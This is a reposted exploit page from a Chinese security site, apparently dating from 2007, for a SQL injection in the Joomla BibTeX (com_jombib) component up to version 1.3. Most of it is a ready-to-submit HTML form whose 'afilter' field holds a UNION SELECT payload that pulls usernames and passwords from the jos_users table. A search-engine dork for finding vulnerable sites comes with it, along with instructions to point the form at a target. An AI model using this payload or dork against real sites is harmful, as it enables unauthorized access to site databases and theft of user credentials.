首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Exploit
来源:http://www.everythingthatiknowabout.com 作者:ajann 发布时间:2007-08-24  
<html>
<head>
<title>Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability</title>
</head>
<body>

<!-- # Title   :  Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability -->
<!-- # Author  :  ajann -->
<!-- # Contact :  :( -->
<!-- # S.Page  :  http://www.everythingthatiknowabout.com -->
<!-- # $$      :  Free -->
<!-- # Dork    :  inurl:index.php?option=com_jombib -->
<!-- # DorkEx  :  http://www.google.com.tr/search?q=inurl:index.php%3Foption%3Dcom_jombib&hl=tr&start=0&sa=N -->
<!-- # .. -->
<!-- # TURKEY -->

<!-- # Note: Pls Edit [form action=] and Direct Submit // form action example: xx.xx/path/index.php?option=com_jombib-->




<form action="...." method="post" name="adminForm">

<table>
<tr>
<td valign="bottom">
Autore
<input type="text" name="afilter" value="abcdefg' union select 111,222,333,444,555,1,1,1,1,1,2,3,4,5,6,1,2,3,4,5,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,4,2,2,2,2,2,0,0,0 from jos_users/*" class="inputbox" onchange="document.adminForm.submit();" size="20" />
</td>
<td valign="bottom">
Titolo
<input type="text" name="filter" value="" class="inputbox" onchange="document.adminForm.submit();" size="20" />
</td>

<td valign="bottom">
<input type="submit" value="Direct Submit"/>
</td>
<td valign="bottom">
&nbsp;&nbsp;&nbsp;Ordina&nbsp;
<select name="order" class="inputbox" size="1"  onchange="document.adminForm.submit();">
<option value="ryear" selected="selected">Date desc</option>
<option value="year">Date asc</option>

<option value="title">Title asc</option>
<option value="rtitle">Title desc</option>
<option value="author">Author asc</option>
<option value="rauthor">Author desc</option>
<option value="journal">Journal asc</option>
<option value="rjournal">Journal desc</option>

<option value="type">Type</option>
</select>
</td >
<td nowrap="nowrap" valign="bottom">
&nbsp;&nbsp;&nbsp;Mostra&nbsp;
<select name="limit" class="inputbox" size="1" onchange="document.location.href='http://www.gruppofrattura.it/index.php?option=com_jombib&amp;&amp;order=ryear&amp;limit=' + this.options[selectedIndex].value + '&amp;limitstart=0';">
<option value="5">5</option>
<option value="10">10</option>

<option value="15">15</option>
<option value="20">20</option>
<option value="25">25</option>
<option value="30">30</option>
<option value="50" selected="selected">50</option>
</select>
</td>

</tr>
</table>


<input type="hidden" name="option" value="com_jombib" />
<input type="hidden" name="catid" value="$catId" />
</form>

</body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP 5.2.3 php_ntuser ntuser_ge
·PHP FFI Extension 5.0.5 Local
·PHP <= 5.2.3 (php_win32sti) Lo
·SunShop 4.0 RC 6 (search) Remo
·PHP <= 5.2.3 (php_win32sti) Lo
·PHP Perl Extension Safe_mode B
·Mercury/32 4.51 SMTPD CRAM-MD5
·SIDVault LDAP Server Preauth R
·ProFTPD 1.x (module mod_tls) R
·Cisco IP Phone 7940 (10 SIP me
·Mercury/32 v3.32-v4.51 SMTP Pr
·Cisco IP Phone 7940 (3 SIP mes
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved